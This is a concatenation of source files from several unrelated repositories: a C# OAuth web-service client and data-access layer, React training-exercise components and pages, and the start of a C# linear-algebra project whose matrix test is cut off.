System.Net.Http; using System.Net.Http.Headers; using System.Text; using System.Threading.Tasks; namespace PCG.GOAL.ExternalDataService.Interface { public interface IClient { HttpClient HttpClient { get; set; } void SetAuthorization(AuthenticationHeaderValue header); void SetMediaType(MediaTypeWithQualityHeaderValue mediaType); Task<HttpResponseMessage> GetAsync(Uri uri); Task<HttpResponseMessage> PostAsync(Uri uri, HttpContent content); Task<HttpResponseMessage> PutAsync(Uri uri, HttpContent content); } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Net.Http; using System.Net.Http.Headers; using System.Text; using System.Threading.Tasks; using Newtonsoft.Json; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; namespace PCG.GOAL.ExternalDataService.Service { public class WebServiceClient<T> : IWebServiceClient<T> where T : class { #region Properties public Func<Credentials> SetCredentials { get; set; } public Action<string> LogError { get; set; } public Credentials Credentials { get; set; } public bool IsSingleResult { get; set; } public string BaseUri { get; set; } public string TokenEndpoint { get; set; } public string ServiceEndpoint { get; set; } public IClient HttpClient { get; set; } public IContent ResponseContent { get; set; } private Uri ServiceEndpointUri { get { return GetUri(EndpointType.ServiceEndpoint, ServiceEndpoint); } } private Uri TokenEndpointUri { get { return GetUri(EndpointType.TokenEndpoint, TokenEndpoint); } } #endregion #region Constructor public WebServiceClient() { HttpClient = new Client<T>(); ResponseContent = new Content<T>(); } public WebServiceClient(IClient client, IContent content) { HttpClient = client; ResponseContent = content; } #endregion #region Public Methods public string GetToken() { try { var postBody = string.Format("username={0}&password={1}&grant_type={2}", Credentials.Username, Credentials.Password, GrantTpype.Password); var authentication = Convert.ToBase64String(Encoding.ASCII.GetBytes(String.Format("{0}:{1}", Credentials.ClientId, Credentials.ClientSecret))); HttpContent requestContent = new StringContent(postBody, Encoding.UTF8, "application/x-www-form-urlencoded"); HttpClient.SetAuthorization(new AuthenticationHeaderValue("Basic", authentication)); var response = HttpClient.PostAsync(TokenEndpointUri, requestContent).Result; if (response.IsSuccessStatusCode) { using (ResponseContent.HttpContent = response.Content) { var tokenResponse = ResponseContent.ReadAsStringAsync().Result; var token = JsonConvert.DeserializeObject<Token>(tokenResponse); return token.AccessToken; } } } catch (HttpRequestException hre) { LogErrorMessage(hre.Message); } catch (TaskCanceledException taskCanceledException) { LogErrorMessage(taskCanceledException.Message); } catch (Exception ex) { LogErrorMessage(ex.Message); } LogErrorMessage("Failed to get token, check your credentials!"); return ""; } public async Task<ResponseData<T>> GetAsync(string token = null) { return await ServiceAction(token, ServiceActionType.Get); } public async Task<ResponseData<T>> PostAsync(IEnumerable<T> records, string token = null) { return await ServiceAction(token, ServiceActionType.Post, records); } public async Task<ResponseData<T>> PutAsync(IEnumerable<T> records, string token = null) { return await ServiceAction(token, ServiceActionType.Put, records); } public async Task<ResponseData<T>> DeleteAsync(IEnumerable<T> records, string token = null) { return await ServiceAction(token, ServiceActionType.Delete, records); } #endregion #region Sevice Calls private async Task<ResponseData<T>> ServiceAction(string token = null, ServiceActionType serviceActionType = ServiceActionType.Get, IEnumerable<T> records = null) { var postBody = records == null ? string.Empty : JsonConvert.SerializeObject(records); HttpContent requestContent = new StringContent(postBody, Encoding.UTF8, "application/json"); var responseData = new ResponseData<T> { Done = false, Data = null, StatusCode = "", Message = "" }; try { if (!string.IsNullOrEmpty(token)) { HttpClient.SetAuthorization(new AuthenticationHeaderValue("Bearer", token)); } HttpClient.SetMediaType(new MediaTypeWithQualityHeaderValue("application/json")); HttpResponseMessage response; switch (serviceActionType) { case ServiceActionType.Get: response = await HttpClient.GetAsync(ServiceEndpointUri); break; case ServiceActionType.Post: response = await HttpClient.PostAsync(ServiceEndpointUri, requestContent); break; case ServiceActionType.Put: response = await HttpClient.PutAsync(ServiceEndpointUri, requestContent); break; case ServiceActionType.Delete: response = await HttpClient.PostAsync(ServiceEndpointUri, requestContent); break; default: // Get response = await HttpClient.GetAsync(ServiceEndpointUri); break; } responseData = GetResponse(response); } catch (HttpRequestException ex) { LogErrorMessage(ex.Message); throw; } catch (Exception exception) { LogErrorMessage(exception.Message); } return responseData; } private ResponseData<T> GetResponse(HttpResponseMessage response) { var failedEndpoint = "service endpoint"; if (response.RequestMessage != null && response.RequestMessage.ToString().IndexOf("?", StringComparison.Ordinal)>0) { failedEndpoint=response.RequestMessage.ToString().Split('?')[0]; } var responseData = new ResponseData<T> { Done = false, Data = null, StatusCode = response.StatusCode.ToString(), Message = string.Format("{0} -- Failed to get data from {1}", response.ReasonPhrase, failedEndpoint) }; using (response) { if (response.IsSuccessStatusCode) { using (ResponseContent.HttpContent = response.Content) { var result = ResponseContent.ReadAsStringAsync().Result; if (IsSingleResult) { var record = JsonConvert.DeserializeObject<T>(result); if (record != null) { responseData.Done = true; responseData.Message = "OK"; responseData.Data = new List<T> { record }; } } else { var record = JsonConvert.DeserializeObject<IEnumerable<T>>(result); if (record != null) { responseData.Done = true; responseData.Message = "OK"; responseData.Data = (IList<T>)record; } } } var message = response.ReasonPhrase == "OK" ? string.Empty : ", " + response.ReasonPhrase; if (responseData.Done != true) { responseData.Message = responseData.Message + message; } } } return responseData; } #endregion #region Private Helper Methods private void LogErrorMessage(string msg) { if (LogError == null) { Console.WriteLine(msg); } else { LogError(msg); } } private enum EndpointType { ServiceEndpoint, TokenEndpoint } private Uri GetUri(EndpointType endpointType, string endpoint) { try { var baseUri = new Uri(BaseUri); return new Uri(baseUri, endpoint); } catch (UriFormatException ex) { throw new Exception(string.Format("Please check the format of BaseUri and {0}", endpointType), ex); } } #endregion } } <file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.WebModels { public class ResponseData<T> { public bool Done { get; set; } public IList<T> Data { get; set; } public string Message { get; set; } public string StatusCode { get; set; } } } <file_sep>using System; using Microsoft.AspNet.Identity; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.DataAccess { public class OAuthValidator : IOAuthValidator { private readonly IDbService _dbService; public OAuthValidator(IDbService dbService) { _dbService = dbService; } public bool ValidateClient(string clientId, string clientSecret) { var client = _dbService.GetClientInfo(clientId); return (client != null && VerifyHashedPassword(client.ClientSecret, clientSecret)); } public Credentials ValidateUser(string username, string password) { var credentials = _dbService.GetCredentials(username); if (credentials != null && VerifyHashedPassword(credentials.Password, password)) { return credentials; } return null; } public bool VerifyHashedPassword(string hashedPassword, string password) { var passwordHasher = new PasswordHasher(); try { return passwordHasher.VerifyHashedPassword(hashedPassword, password)==PasswordVerificationResult.Success; } catch (Exception) { return false; } } } } <file_sep>(function () { angular.module("webServices", ['ui.router', 'ui.bootstrap']) .run(function ($rootScope, $state) { $rootScope.$state = $state; }); })(); (function () { var app = angular.module("webServices"); var dataServicePrefix = "/api/"; var config = { docTitle: "Goal Web Service", dataServicePrefix: dataServicePrefix, dataServicePath: buildDataServicePath, cacheMaxAge: 5000, enableConsoleLog: true, enableToastrLog: true, version: '1.0.0' }; function buildDataServicePath(endPoint,prefix) { if (!endPoint) { throw "End Point Is Empty!!"; } endPoint = buildPath(endPoint.trim()); if (!prefix) { prefix = dataServicePrefix; } else { prefix = buildPath(prefix); } return prefix + endPoint; } function buildPath(path) { if (path.indexOf('/') === 0) { path = path.substr(1); } if (path.indexOf('/') === path.length - 1) { path = path.substr(0, path.length - 1); } return path; } app.value("config", config); app.factory("logService", [function() { return { logError: function(data,disableToastr) { if (config.enableConsoleLog) { console.log("message: " + data.message + "\n" + "exceptionType: " + data.exceptionType + "\n" + "exceptionMessage: " + data.exceptionMessage); } if (config.enableToastrLog && !disableToastr) { if (data && data.exceptionMessage) { toastr.error(data.exceptionMessage); } else { toastr.error("An error has occurred."); } } } }; }]); app.config(["$logProvider", function($logProvider) { // turn debugging off/on if ($logProvider.debugEnabled) { $logProvider.debugEnabled(true); } }]); app.config([ "$httpProvider", function($httpProvider) { $httpProvider.defaults.withCredentials = true; } ]); })();<file_sep>using Microsoft.VisualStudio.TestTools.UnitTesting; using System.Data; using System.Data.SqlClient; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.Interface; using PCG.GOAL.WebService.Controllers; namespace PCG.GOAL.WebService.Test.Controllers { [TestClass()] public class AdminControllerTests { private IDbService _dbService; private ServiceAdminController _adminController; private SqlConnection _sqlConnection; [TestInitialize] public void TestInitialize() { _sqlConnection =new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename=D:\Dev\2015\gvtrunk\gvtrunk\web_root\wsRethink\PCG.GOAL.WebService\App_Data\GoalServiceDb.mdf;Integrated Security=True"); _dbService = new DbService(new SqlDataAccess(_sqlConnection)); _adminController = new ServiceAdminController(_dbService); } [TestMethod()] public void GetCredentialsTest() { var result = _adminController.GetCredentials(); Assert.IsNotNull(result); } } } <file_sep>using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.WebService.Test.WebClient { public class OAuthAccess { public Credentials GetCredentials() { // todo: get credentials from db var credentials = new Credentials { ClientId = "goalview", ClientSecret = "goalview", Username = "admin", Password = "<PASSWORD>" }; return credentials; } } }<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.Interface { public interface IDbService { Credentials GetCredentials(string username); Credentials GetCredentialsById(int id); IEnumerable<Credentials> GetAllCredentials(); void AddCredentials(Credentials credentials); void UpdateCredentials(Credentials credentials); void DeleteCredentials(int id); ClientInfo GetClientInfo(string clientId); ClientInfo GetClientInfoById(int id); IEnumerable<ClientInfo> GetAllClientInfo(); void AddClientInfo(ClientInfo clientInfo); void UpdateClientInfo(ClientInfo clientInfo); void DeleteClientInfo(int id); } } <file_sep>using System; using System.Collections.Generic; using System.Data.Entity; using System.Data.Entity.Infrastructure; using System.Linq; using System.Linq.Expressions; using System.Threading.Tasks; using DataAccess.Common.Interfaces; namespace DataAccess.Common.Services { /// <summary> /// The EF-dependent, generic repository for data access /// </summary> /// <typeparam name="T">Type of entity for this Repository.</typeparam> public class EFRepository<T> : IRepository<T> where T : class { public EFRepository(DbContext dbContext) { if (dbContext == null) throw new ArgumentNullException("dbContext"); DbContext = dbContext; DbSet = DbContext.Set<T>(); } protected DbContext DbContext { get; set; } protected DbSet<T> DbSet { get; set; } public virtual IQueryable<T> GetAll() { return DbSet; } public virtual T GetById(int id) { return DbSet.Find(id); } public virtual void Add(T entity) { DbEntityEntry dbEntityEntry = DbContext.Entry(entity); if (dbEntityEntry.State != EntityState.Detached) { dbEntityEntry.State = EntityState.Added; } else { DbSet.Add(entity); } } public virtual void Update(T entity) { DbEntityEntry dbEntityEntry = DbContext.Entry(entity); if (dbEntityEntry.State == EntityState.Detached) { DbSet.Attach(entity); } dbEntityEntry.State = EntityState.Modified; } public virtual void Delete(T entity) { DbEntityEntry dbEntityEntry = DbContext.Entry(entity); if (dbEntityEntry.State != EntityState.Deleted) { dbEntityEntry.State = EntityState.Deleted; } else { DbSet.Attach(entity); DbSet.Remove(entity); } } public virtual void Delete(int id) { var entity = GetById(id); if (entity == null) return; // not found; assume already deleted. Delete(entity); } public IQueryable<T> Find(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.Where(where); } public T Single(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.Single(where); } public T First(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.FirstOrDefault(where); } public Task<T> FirstAsync(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties) { IQueryable<T> query = GetAll(); query = PerformInclusions(includeProperties, query); return query.FirstOrDefaultAsync(where); } private static IQueryable<T> PerformInclusions(IEnumerable<Expression<Func<T, object>>> includeProperties, IQueryable<T> query) { return includeProperties.Aggregate(query, (current, includeProperty) => current.Include(includeProperty)); } } } <file_sep>using System; using System.Collections.Generic; using System.Configuration; using System.Data; using System.Data.SqlClient; using System.Linq; namespace DataAccess.Common.Services { public class SqlDataAccess : IDisposable { private const string SqlConnectionKey = "SQLConn"; public SqlDataAccess() { try { Connection = new SqlConnection(ConfigurationManager.ConnectionStrings[SqlConnectionKey].ToString()); } catch (Exception e) { throw new Exception(string.Format("Failed to read connection string '{0}'", SqlConnectionKey), e); } } public SqlDataAccess(SqlConnection connection) { this.Connection = connection; } public SqlConnection Connection { get; set; } protected SqlTransaction Transaction { get; set; } public void OpenConnection() { if (this.Connection == null) { throw new Exception("Connection has not been initialized!"); } if (this.Connection.State == ConnectionState.Closed) { this.Connection.Open(); } } private SqlCommand NewCommand(string storedPorc, CommandType commandType = CommandType.StoredProcedure) { var command = new SqlCommand { Connection = this.Connection, CommandType = commandType, CommandText = storedPorc, CommandTimeout = 400000 }; if (this.Transaction != null) command.Transaction = this.Transaction; return command; } public SqlDataReader GetReader(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(storedProcedureKey)) { if (parameters != null) { command.Parameters.AddRange(parameters.ToArray()); } return closeConnection ? command.ExecuteReader(CommandBehavior.CloseConnection) : command.ExecuteReader(); } } public SqlDataReader GetReaderBySql(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(sqlStatement, CommandType.Text)) { return closeConnection ? command.ExecuteReader(CommandBehavior.CloseConnection) : command.ExecuteReader(); } } public DataTable GetTableBySql(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = NewCommand(sqlStatement, CommandType.Text)) { var reader = command.ExecuteReader(CommandBehavior.CloseConnection); var table = new DataTable(); table.Load(reader); return table; } } public object GetScalar(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(storedProcedureKey)) { if (parameters != null) { command.Parameters.AddRange(parameters.ToArray()); } var ret = command.ExecuteScalar(); if (closeConnection) { this.Connection.Close(); } return ret; } } public object GetScalar(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(sqlStatement, CommandType.Text)) { var ret = command.ExecuteScalar(); if (closeConnection) { this.Connection.Close(); } return ret; } } public int ExecuteNonQuery(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(storedProcedureKey)) { if (parameters != null) { command.Parameters.AddRange(parameters.ToArray()); } int ret = command.ExecuteNonQuery(); if (parameters != null) { foreach (SqlParameter p in command.Parameters) { if (p.Direction == ParameterDirection.Output) { parameters.First(pr => pr.ParameterName == p.ParameterName).Value = p.Value; } } } if (closeConnection) { this.Connection.Close(); } return ret; } } public int ExecuteNonQuery(string sqlStatement, bool closeConnection = true) { this.OpenConnection(); using (SqlCommand command = this.NewCommand(sqlStatement, CommandType.Text)) { int ret = command.ExecuteNonQuery(); if (closeConnection) { this.Connection.Close(); } return ret; } } public void BulkCopy(string targetTable, DataTable data, bool closeConnection = true, Dictionary<string, string> mappings = null) { this.OpenConnection(); using (var bulkCopy = new SqlBulkCopy(this.Connection)) { bulkCopy.DestinationTableName = targetTable; if (mappings == null) { for (var i = 0; i < data.Columns.Count; ++i) { bulkCopy.ColumnMappings.Add(data.Columns[i].ColumnName, data.Columns[i].ColumnName); } } else { foreach (var pair in mappings) { bulkCopy.ColumnMappings.Add(pair.Value, pair.Key); } } bulkCopy.WriteToServer(data); } if (closeConnection) this.Connection.Close(); } protected T GetSafeValue<T>(IDataRecord record, string field) { if (record[field] is DBNull) return default(T); return (T)record[field]; } protected T? GetSafeNullable<T>(IDataRecord record, string field) where T : struct { if (record[field] is DBNull) return null; return (T?)record[field]; } public static string GetSafeString(IDataRecord record, string field) { if (record[field] is DBNull) return null; return record[field].ToString(); } public void Dispose() { if (this.Connection != null) { if (this.Connection.State != ConnectionState.Closed) { this.Connection.Close(); } this.Connection.Dispose(); } GC.SuppressFinalize(this); } } } <file_sep>namespace PCG.GOAL.Common.Models { public class BehaviorObjective { public string ObjectiveText { get; set; } public BehaviorMasteryCriteria MasteryCriteria { get; set; } } }<file_sep> using System.Net; using System.Net.Http; using System.Web.Http; using System.Web.Http.Controllers; namespace PCG.GOAL.WebService.Security { public class ApiAuthorizeAttribute : AuthorizeAttribute { protected override void HandleUnauthorizedRequest(HttpActionContext actionContext) { actionContext.Response = actionContext.Request.CreateResponse(HttpStatusCode.Unauthorized); actionContext.Response.ReasonPhrase = "Unauthorized Web Service Request"; base.HandleUnauthorizedRequest(actionContext); } } }
25f1828e68bfb73d69b1518b1c1735e4a4f5fece
[ "JavaScript", "C#" ]
50
C#
niceliubing/PCG.GOAL
fb52ceee2ac9881d8eb6633aff28c5f657e3f3e1
f862aa937fe014a9bfad69091198bd845af5a387
refs/heads/master
<repo_name>jennifervphan/lab-react-training<file_sep>/starter-code/src/pages/RandomPage.jsx import React, { Component } from 'react' import Random from '../components/Random.jsx' export default class RandomPage extends Component { render() { return ( <div> <Random min={1} max={6}/> <Random min={1} max={100}/> </div> ) } } <file_sep>/starter-code/src/pages/DriverPage.jsx import React, { Component } from 'react'; import DriverCard from '../components/DriverCard.jsx'; import '../components/DriverCard.css' export default class DriverPage extends Component { render() { return ( <div class="drivers"> <DriverCard name="<NAME>" rating={4.2} img="https://si.wsj.net/public/resources/images/BN-TY647_37gql_OR_20170621052140.jpg?width=620&height=428" car={{ model: "Toyota Corolla Altis", licensePlate: "CO42DE" }} /> <DriverCard name="<NAME>" rating={4.9} img="https://ubernewsroomapi.10upcdn.com/wp-content/uploads/2017/09/Dara_ELT_Newsroom_1000px.jpg" car={{ model: "Audi A3", licensePlate: "BE33ER" }} /> </div> ) } } <file_sep>/starter-code/src/components/IdCard.js import React,{Component} from 'react'; import './IdCard.css'; class IdCard extends Component{ render(){ debugger const {picture,lastName,firstName,gender,height,birth} =this.props; return ( <div className="idCard"> <img src={picture} alt=""></img> <div> <p>Last Name: <span>{lastName}</span></p> <p>First Name: <span>{firstName}</span></p> <p>Gender: <span>{gender}</span></p> <p>Height: <span>{height}cm</span></p> <p>Birthday: <span>{birth}</span></p> </div> </div> ) } } export default IdCard <file_sep>/starter-code/src/pages/NumbersTablePage.jsx import React, { Component } from 'react'; import NumbersTable from '../components/NumbersTable.jsx'; export default class NumbersTablePage extends Component { render() { return ( <div> <NumbersTable limit={12} /> </div> ) } } <file_sep>/starter-code/src/components/Routes.jsx import React, { Component } from 'react'; import {Route} from 'react-router-dom'; import IdCardPage from "../pages/IdCardPage.jsx"; import GreetingsPage from '../pages/GreetingsPage.jsx'; import RandomPage from '../pages/RandomPage.jsx'; import BoxcolorPage from '../pages/BoxcolorPage.jsx'; import CreditcardPage from '../pages/CreditcardPage.jsx'; import RatingPage from '../pages/RatingPage'; import DriverPage from '../pages/DriverPage'; import LikePage from '../pages/LikePage'; import ClickablePage from '../pages/ClickablePage.jsx'; import DicePage from '../pages/DicePage.jsx'; import CarouselPage from '../pages/CarouselPage.jsx'; import NumbersTablePage from '../pages/NumbersTablePage'; export default class Routes extends Component { render() { return ( <div> <Route path = "/idCard" component ={IdCardPage}/> <Route path="/greetings" component ={GreetingsPage}/> <Route path="/random" component ={RandomPage}/> <Route path="/boxcolor" component ={BoxcolorPage}/> <Route path="/creditcard" component ={CreditcardPage}/> <Route path="/rating" component ={RatingPage}/> <Route path="/driverCard" component ={DriverPage}/> <Route path="/like" component ={LikePage}/> <Route path="/clickable" component ={ClickablePage}/> <Route path="/dice" component ={DicePage}/> <Route path="/carousel" component ={CarouselPage}/> <Route path="/numbersTable" component ={NumbersTablePage}/> </div> ) } } <file_sep>/starter-code/src/components/Random.jsx import React, { Component } from 'react' export default class Random extends Component { render() { const {min, max}=this.props; let randomNum=Math.floor(Math.random()*max + min); return ( <div> <h3>Random value between {min} and {max} => {randomNum}</h3> </div> ) }}<file_sep>/starter-code/src/components/DriverCard.jsx import React, { Component } from 'react'; import Rating from './Rating'; import './DriverCard.css'; export default class DriverCard extends Component { render() { debugger const {name, rating, img, car} = this.props; return ( <div className="driverCard"> <div> <img src={img} alt=""></img> </div> <div> <h1>{name}</h1> <Rating>{rating}</Rating> <p>{car.model}-{car.licensePlate}</p> </div> </div> ) } } <file_sep>/starter-code/src/pages/BoxcolorPage.jsx import React, { Component } from 'react'; import BoxColor from '../components/BoxColor.jsx' export default class BoxcolorPage extends Component { render() { return ( <div> <BoxColor r={255} g={0} b={0} /> <BoxColor r={128} g={255} b={0} /> </div> ) } } <file_sep>/starter-code/src/components/Rating.jsx import React, { Component } from 'react' export default class Rating extends Component { render() { let rate =this.props.children; let blackNumber ; if (rate%rate > 0.5){ blackNumber= Math.ceil(rate); } else{ blackNumber=Math.floor(rate); } debugger let whiteNumber=5-blackNumber; let whitestars= ("☆").repeat(whiteNumber) let blackstars= ("★").repeat(blackNumber) let stars=blackstars+whitestars; return ( <div> <h1>{stars}</h1> </div> ) } } <file_sep>/starter-code/src/pages/ClickablePage.jsx import React, { Component } from 'react'; import ClickablePicture from '../components/ClickablePicture.jsx'; export default class ClickablePage extends Component { render() { return ( <ClickablePicture img="/img/persons/maxence.png" imgClicked="/img/persons/maxence-glasses.png" /> ) } } <file_sep>/starter-code/src/pages/RatingPage.jsx import React, { Component } from 'react'; import Rating from '../components/Rating.jsx'; export default class RatingPage extends Component { render() { return ( <div> <Rating>0</Rating> <Rating>1.49</Rating> <Rating>1.5</Rating> <Rating>3</Rating> <Rating>4</Rating> <Rating>5</Rating> </div> ) } } <file_sep>/starter-code/src/components/NumbersTable.jsx import React, { Component } from 'react' export default class NumbersTable extends Component { numberOfDivs=(limit)=>{ let divs=( <div>2</div> ).repeat(limit); return divs; } render() { const {limit}=this.props; debugger return ( <div> {this.numberOfDivs(limit)} </div> ) } } <file_sep>/starter-code/src/components/Carousel.jsx import React, { Component } from 'react'; export default class Carousel extends Component { state={ imgs: this.props, imgDisplayed: this.props.imgs[0], index:0 } afterPic=()=>{ let index=this.state.index; let allImgs=this.state.imgs; index<allImgs.imgs.length-1?index+=1:index=allImgs.imgs.length-1; let newImg=allImgs.imgs[index] this.setState({imgDisplayed:newImg,index:index}) } beforePic=()=>{ let index=this.state.index; let allImgs=this.state.imgs; index>0? index-=1:index=0; let newImg=allImgs.imgs[index] this.setState({imgDisplayed:newImg,index:index}) } render() { debugger return ( <div> <button onClick={this.beforePic}>Before</button> <img src={this.state.imgDisplayed} alt=""></img> <button onClick={this.afterPic}>After</button> </div> ) } } <file_sep>/starter-code/src/components/Greeting.jsx import React, { Component } from 'react' export default class Greeting extends Component { render() { const {lang}=this.props; let greeting=""; switch (lang) { case "de": greeting="Hallo"; break; case "fr": greeting="Bonjour"; break; default: greeting="Hello"; } return ( <div> <h3>{greeting} {this.props.children}</h3> </div> ) } } <file_sep>/starter-code/src/components/Creditcard.jsx import React, { Component } from 'react'; import './Creditcard.css'; export default class Creditcard extends Component { render() { const {type, number, expirationMonth, expirationYear, bank, owner, bgColor, color}=this.props; let image; if (type==="Visa") { image="img/visa.png" } else{ image="img/master-card.svg" } let displayedNum=number.slice(number.length-4,number.length); let month if (expirationMonth<10){ month="0" + expirationMonth }else{ month=expirationMonth } return ( <div className="eachCredit" style={{backgroundColor:bgColor,color:color}}> <div> <img src={image} alt=""></img> </div> <div> <p className="bankAcc"><span>• • • •</span> <span>• • • •</span> <span>• • • •</span> {displayedNum}</p> </div> <div> <div className="bankName"> <p>Expires {month}/{expirationYear}</p> <p>{bank}</p> </div> <p>{owner}</p> </div> </div> ) } } <file_sep>/starter-code/src/pages/CarouselPage.jsx import React, { Component } from 'react'; import Carousel from '../components/Carousel.jsx'; export default class CarouselPage extends Component { render() { return ( <div> <Carousel imgs={["https://randomuser.me/api/portraits/women/1.jpg", "https://randomuser.me/api/portraits/men/1.jpg", "https://randomuser.me/api/portraits/women/2.jpg", "https://randomuser.me/api/portraits/men/2.jpg"]} /> </div> ) } } <file_sep>/starter-code/src/components/Nav.jsx import React, { Component } from 'react'; import {Link} from "react-router-dom"; export default class Nav extends Component { render() { return ( <div> <ul> <li><Link to="/idCard">Id Card</Link></li> <li><Link to="/greetings">Greetings</Link></li> <li><Link to="/random">Random Number</Link></li> <li><Link to="/boxcolor">Box Color</Link></li> <li><Link to="/creditcard">Credit Card</Link></li> <li><Link to="/rating">Rating</Link></li> <li><Link to="/driverCard">Diver's Card</Link></li> <li><Link to="/like">Like Button</Link></li> <li><Link to="/clickable">Clickable Picture</Link></li> <li><Link to="/dice">Dice</Link></li> <li><Link to="/carousel">Carousel</Link></li> <li><Link to="/numbersTable">Numbers Table</Link></li> </ul> </div> ) } } <file_sep>/starter-code/src/components/ClickablePicture.jsx import React, { Component } from 'react'; export default class ClickablePicture extends Component { state ={ display2: "none", display1:"block" } togglePic=()=>{ debugger return( this.state.display1==="block" && this.state.display2==="none"? this.setState({display1:"none",display2:"block"}): this.setState({display1:"block",display2:"none"}) ) } render() { const {imgClicked,img}=this.props; return ( <div> <img style={{display:this.state.display1}} onClick={this.togglePic} src={img} alt=""></img> <img style={{display:this.state.display2}} onClick={this.togglePic} src={imgClicked} alt=""></img> </div> ) } }
9fdb16d70332d5410a7ee2d831a3c5f290631004
[ "JavaScript" ]
18
JavaScript
jennifervphan/lab-react-training
ed0fb6401ce4098916bbf5b909b69228e24daa65
4281262fe6859618595afafd192bfb90edf11a24
refs/heads/master
<file_sep>#include <stdio.h> int main() { int n, tong = 0; printf("Nhap so n : "); scanf("%d",&n); for(int i = 1 ; i <= n ; i++){ if(n % i == 0 ){ printf("U = %d\n",i); tong += i; } } printf("Tong cac uoc la: %d",tong); } <file_sep>#include <stdio.h> int main() { int n, tong = 0 , check = 0; printf("Nhap so n : "); scanf("%d",&n); for(int i = 2 ; i < n ; i++){ for(int j = 2 ; j < i ; j++){ if(i % j == 0){ check++; } } if(check == 0){ printf("N = %d\n",i); }else{ check = 0; } } } <file_sep>#include <stdio.h> int main() { int n; printf("Nhap so n : "); scanf("%d",&n); printf("Cac so chan nho hon n la: \n"); for(int i = 0 ; i < n ; i++){ if(i % 2 == 0 ){ printf("%d\n",i); } } } <file_sep>#include <stdio.h> int main) { int a , b ; printf("Nhap so a (a < b): "); scanf("%d",&a); printf("Nhap so b (b > a): "); scanf("%d",&b); if(a < b){ for(a ; a < b ; a++){ if(a < 2){ continue; } int check = 0; for(int i = 2 ; i < a ; i++){ if(a % i == 0){ check++; } } if(check == 0){ printf("N = %d\n",a); } } }else{ printf("Ban nhap sai !! Nhap a < b"); } }
c91cd0693ebe5f3115c2d3be56feac202ddcb404
[ "C++" ]
4
C++
Manh2362000/T2008M_LBEP
50bc5fc8305fd8458005dfea26fe8aa3ed263d91
5d2803e5869198869172c02da0c4bd91c9924c72
refs/heads/master
<file_sep><?php /** * @file * Contains \Drupal\drupal8_base_module\Controller\BaseModuleController. */ namespace Drupal\drupal8_base_module\Controller; use Drupal\Core\Controller\ControllerBase; /** * Controller routines for my module routes. */ class BaseModuleController extends ControllerBase { /** * Returns an administrative overview of my module. * * @return array * A render array representing the administrative page content. */ public function adminOverview() { return array( '#type' => 'markup', '#markup' => $this->t('Hello, World!'), ); } } <file_sep>CONTENTS OF THIS FILE --------------------- * Introduction * Requirements * Recommended modules * Installation * Configuration * Troubleshooting * FAQ * Maintainers * References INTRODUCTION ------------ This is a codebase to create and develop your custom Drupal 8 module. REQUIREMENTS ------------ RECOMMENDED MODULES ------------------- INSTALLATION ------------ * Install as you would normally install a contributed Drupal module. See: https://drupal.org/documentation/install/modules-themes/modules-7 for further information. CONFIGURATION ------------- * On the setting page /admin/config/my-module-setting insert the title and the description for your feed and choose which product you want to include into it. TROUBLESHOOTING --------------- FAQ --- MAINTAINERS ----------- Current maintainers: * <NAME> (robertoperuzzo) - https://www.drupal.org/u/robertoperuzzo This project has been sponsored by: * STUDIO AQUA Specialized in designing and developing Drupal powered sites, we belive that the online business is measurable for a environmentally sustainable Web. Visit http://www.studioaqua.it for more information. REFERENCES ---------- * Creating Drupal 8.x modules (https://www.drupal.org/developing/modules/8) * Routing system in Drupal 8 (https://www.drupal.org/node/2122071) * D7 to D8 upgrade tutorial: Convert hook_menu() and hook_menu_alter() to Drupal 8 APIs (https://www.drupal.org/node/2118147) * PSR-4 namespaces and autoloading in Drupal 8 (https://www.drupal.org/node/2156625) * Building modules with Drupal 8 (https://docs.acquia.com/articles/building-drupal-8-modules) * README Template (https://www.drupal.org/node/1800686)
d97e6bba7e431f6c3d2f2f3400205d5e423fb9d6
[ "Text", "PHP" ]
2
PHP
studioaqua/drupal8_base_module
dba1c91715794526fda87a5e9edd375997ee3ad4
ae2d2aed840dfe71eb2680bfe9c5adf1f94ae8b2
refs/heads/master
<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LINAL { public class Point { private float x; private float y; private float z; public Point(float x, float y) { this.x = x; this.y = y; } public Point(float x, float y, float z) { this.x = x; this.y = y; this.z = z; } public float GetX() { return x; } public void SetX(float x) { this.x = x; } public float GetY() { return y; } public void SetY(float y) { this.y = y; } public float GetZ() { return z; } public void SetZ(float z) { this.z = z; } public bool Is3D() { return z != 0; } public Vector MakeVector() { Point p2 = new Point(x,y,z); Point p1 = new Point(0,0,0); return new Vector(p1, p2); } } } <file_sep>using System; using LINAL; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace LINAL_Test { [TestClass] public class MatrixTest { private Matrix mockingMatrix; [TestInitialize] public void init() { mockingMatrix = new Matrix(3, 3); float[,] data = { { 0, 1, 2 }, { 1, 2, 4 }, { 8, 4, 2 } }; mockingMatrix.SetData(data); } [TestMethod] public void MatrixInversion() { 